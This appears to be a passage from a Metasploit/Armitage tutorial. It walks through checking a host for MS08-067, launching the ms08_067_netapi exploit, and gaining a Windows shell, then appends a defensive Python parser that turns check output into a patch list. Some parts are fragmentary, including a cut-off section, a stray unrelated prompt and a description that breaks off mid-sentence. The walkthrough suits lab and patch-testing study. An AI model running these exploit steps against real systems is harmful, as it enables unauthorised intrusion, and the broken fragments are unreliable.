===== Checking windows/smb/ms08_067_netapi =====

use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(ms08_067_netapi) > check
[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.

===== Checking windows/smb/ms10_061_spoolss =====

msf exploit(timbuktu_plughntcommand_bof) >

Next, right-click the target host again and choose "Attack - smb - ms08_067_netapi". The exploit configuration window shown in Figure 14 pops up; keep the defaults and click "Launch".

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will

C:\WINDOWS\system32> ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.1.105
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

C:\WINDOWS\system32>

We have now successfully turned a machine vulnerable to MS08-067 into a compromised host under our control. Armitage's full automation is very helpful to administrators who test their hosts for vulnerabilities, but we hope it is used for legitimate purposes :).
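An added example, not part of the original article or of Armitage: a small Python parser that turns a "Check Exploits" transcript in the layout shown above into the list of host and bulletin pairs an administrator needs to patch. The function names and the embedded sample transcript are assumptions made for this example, and only a "[+] ... vulnerable" line is counted as a positive result.

```python
import re

# Constructed sample in the layout shown on the page; the second section has
# no verdict line, so it must not be reported as vulnerable.
SAMPLE = """\
===== Checking windows/smb/ms08_067_netapi =====
use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(ms08_067_netapi) > check
[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
===== Checking windows/smb/ms10_061_spoolss =====
use windows/smb/ms10_061_spoolss
"""

HEADER = re.compile(r"^=+\s*Checking\s+(\S+)\s*=+\s*$")
RHOST = re.compile(r"^RHOST\s*=>\s*(\S+)")
BULLETIN = re.compile(r"ms(\d{2})_(\d{3})")

def bulletin_id(module):
    # Derive the Microsoft bulletin (e.g. MS08-067) from the module name.
    m = BULLETIN.search(module)
    return "MS%s-%s" % m.groups() if m else None

def parse_checks(text):
    # One record per "===== Checking <module> =====" section.
    findings, current = [], None
    for line in text.splitlines():
        line = line.strip()
        h = HEADER.match(line)
        if h:
            current = {"module": h.group(1), "host": None,
                       "bulletin": bulletin_id(h.group(1)), "vulnerable": False}
            findings.append(current)
        elif current is None:
            continue  # text before the first section header
        elif (r := RHOST.match(line)):
            current["host"] = r.group(1)
        elif line.startswith("[+]") and "vulnerable" in line.lower():
            current["vulnerable"] = True
    return findings

def patch_list(findings):
    # Unique (host, bulletin) pairs that had a positive check result.
    return sorted({(f["host"], f["bulletin"]) for f in findings
                   if f["vulnerable"] and f["host"] and f["bulletin"]})
```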